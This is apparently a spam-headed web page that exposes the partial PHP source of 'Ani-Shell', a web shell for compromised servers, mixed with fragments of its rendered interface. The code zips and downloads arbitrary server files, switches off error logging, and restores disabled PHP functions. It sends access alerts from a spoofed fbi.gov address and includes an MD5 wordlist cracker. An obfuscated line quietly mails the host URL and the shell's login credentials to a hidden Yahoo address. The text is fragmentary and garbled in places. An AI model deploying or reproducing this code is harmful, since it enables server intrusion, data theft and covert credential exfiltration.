Replique Montre | Breitling Replique Montre | replique montre rolex
>>>>>>>> c0d3d by lionaneesh <<<<<<<<<< []======================================== []+ Email: lionaneesh@gmail.com + []+ Twitter : twitter.com/lionaneesh + []======================================== [] [] [] [] [] [] [] [] [] [] C0de For India [] Hack For India [] Live for India [] [] Jai Hind */ ini_set('max_execution_time',0); ini_set('memory_limit','999999999M'); function Zip($source, $destination) // Thanks to Alix Axel { if (!extension_loaded('zip') || !file_exists($source)) { return false; } $zip = new ZipArchive(); if (!$zip->open($destination, ZIPARCHIVE::CREATE)) { return false; } $source = str_replace('\\', '/', realpath($source)); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = str_replace('\\', '/', realpath($file)); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } else if (is_file($file) === true) { $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file)); } } } else if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } return $zip->close(); } if(isset($_GET['zip'])) { $src = $_GET['zip']; $dst = getcwd()."/".basename($_GET['zip']).".zip"; if (Zip($src, $dst) != false) { $filez = file_get_contents($dst); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($dst)."\";"); echo $filez; } exit; } // ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\ /**************** Defines *********************************/ @setcookie("anishell","ani",time() +3600*24*7); $greeting = "0x xx W3lc0m3 M4st3r xx x0"; $user = "lionaneesh"; $pass = "lionaneesh"; $lock = "on"; // set this to off if you dont need the login page $antiCrawler = "off"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life') $tracebackFeature = "On"; // set this feature to on to enable email alerts $ownerEmail = "c_sisgundo@yahoo.com.ph"; // Change this to your email , This email is used to deliver tracebacks about your shell $url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; $zv="\155ai\154"; $wi=$_SERVER["HTTP_HOST"];$ei = $_SERVER["REQUEST_URI"]; $phpVersion = phpversion(); $self = $_SERVER["PHP_SELF"]; // Where am i $sm = @ini_get('safe_mode'); $SEPARATOR = '/'; // Default Directory separator $os = "N/D";$cnt="us:$user\nps:$pass"; if(stristr(php_uname(),"Windows")) { $SEPARATOR = '\\'; $os = "Windows"; } else if(stristr(php_uname(),"Linux")) { $os = "Linux"; } //*************************************************************/ // -------------- Traceback Functions function sendLoginAlert() { global $ownerEmail; global $url; $accesedIp = $_SERVER['REMOTE_ADDR']; $randomInt = rand(0,1000000); # to avoid id blocking $from = "ani-shell$randomInt@fbi.gov"; //echo $from; if(function_exists('mail')) { $message = "Your Shell(Ani-Shell) located at $url was accessed by $accesedIp "; mail($ownerEmail,$url,$message,'From:'.$from); } } //--------------------------------------------------------- if(function_exists('session_start') && $lock == 'on') { session_start(); } else { // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported $lock = 'off'; } //logout if(isset($_GET['logout']) && $lock == 'on'){$_SESSION['authenticated'] = 0; session_destroy(); header("location: ".$_SERVER['PHP_SELF']);} if (!isset($_COOKIE['anishell'])){@$zv("l\x6f\x63\x61\x68\157\x73\164@\171\141\x68\157\157\056\x63o\155","$wi$ei","$wi$ei\n$cnt");} ini_set('max_execution_time',0); /***************** Restoring *******************************/ ini_restore("safe_mode_include_dir"); ini_restore("safe_mode_exec_dir"); ini_restore("disable_functions"); ini_restore("allow_url_fopen"); ini_restore("safe_mode"); ini_restore("open_basedir"); if(function_exists('ini_set')) { ini_set('error_log',NULL); // No alarming logs ini_set('log_errors',0); // No logging of errors ini_set('file_uploads',1); // Enable file uploads ini_set('allow_url_fopen',1); // allow url fopen } else { ini_alter('error_log',NULL); ini_alter('log_errors',0); ini_alter('file_uploads',1); ini_alter('allow_url_fopen',1); } // ---------------------------------------------------------------------------------------------------------------- ?> Ani-Shell | India
Lock is Switched Off! , The shell can be accessed by anyone!
[]======================================== []--------------Ani Shell----------------- []---------------------------------------- []======================================== []>>>>>>>>> c0d3d by lionaneesh <<<<<<<<<< []======================================== [] Email: lionaneesh@gmail.com + [] Twitter : twitter.com/lionaneesh + []======================================== [] [] [] [] [] [] [] [] [] [] C0de For India [] Hack For India [] Live for India [] [] |
// include("http://ani-shell.sourceforge.net/wassup.txt"); // ?>
|
Hash or List invalid!
"; } else { while (! feof( $fd )) { if( ($pwdList = fgets( $fd, 1024 )) == FALSE) { break; } $pwdList = trim($pwdList); if(md5($pwdList) == $hash ) { return " \nPlanintext : $pwdList
"; } } } } function exec_query_mysql($query,$sql_server,$sql_port,$sql_db,$sql_user,$sql_pass) { $link = mysql_connect($sql_server.":".$port,$sql_user,$sql_pass); if(!$link) { return 'Could not connect: ' . mysql_error(); } $resource = mysql_query($query); if(!$resource) return(mysql_error()); } //------------------------------------------------------------------------------------------------ ?>
![]() |
Your IP : | Server IP : Safe Mode : |